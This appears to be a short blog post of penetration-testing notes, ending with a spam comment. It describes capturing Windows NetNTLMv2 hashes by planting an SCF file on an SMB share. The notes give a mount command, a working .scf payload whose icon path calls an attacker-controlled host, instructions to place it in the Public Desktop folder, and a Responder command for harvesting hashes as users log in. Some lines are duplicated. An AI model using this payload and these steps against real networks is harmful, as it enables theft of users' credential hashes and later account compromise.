SMB - SCF (Shell Command Files) - File Attacks (NetNTLMv2 hash(challenge) grab)
Upload the file like so...
mount -t cifs '//10.10.10.103/Department shares' -o username=amanda /mnt
[Shell]Command=2IconFile=\\X.X.X.X\share\pentestlab.ico[Taskbar]Command=ToggleDesktop
Create a file steal_hash.scf with the above in it. Add the correct Attackers IP address
Next upload the file into the Desktop within the Public Folders.The Public/Desktop folder is accessed every time any users logs in.Therefore when the user logs in, the icon is requested from our attackers box, a challenge request is requested by the attacker, a challenger response is then returned to use with the NetNTLMv2.
Upload the file like so...
mount -t cifs '//10.10.10.103/Department shares' -o username=amanda /mnt
If we have a readable and mountable SMB share with Public, then we can add this by
combining the two attacks together.
combining the two attacks together.
Next start Responder - only very basic settings needed.
responder -I tun0
And now wait for a user to log in and we should see the NetNTLMv2 :-)
Thank you for your post. This is excellent information. It is amazing and wonderful to visit your site.
ReplyDeletePlastic Injection Mold Manufacturers China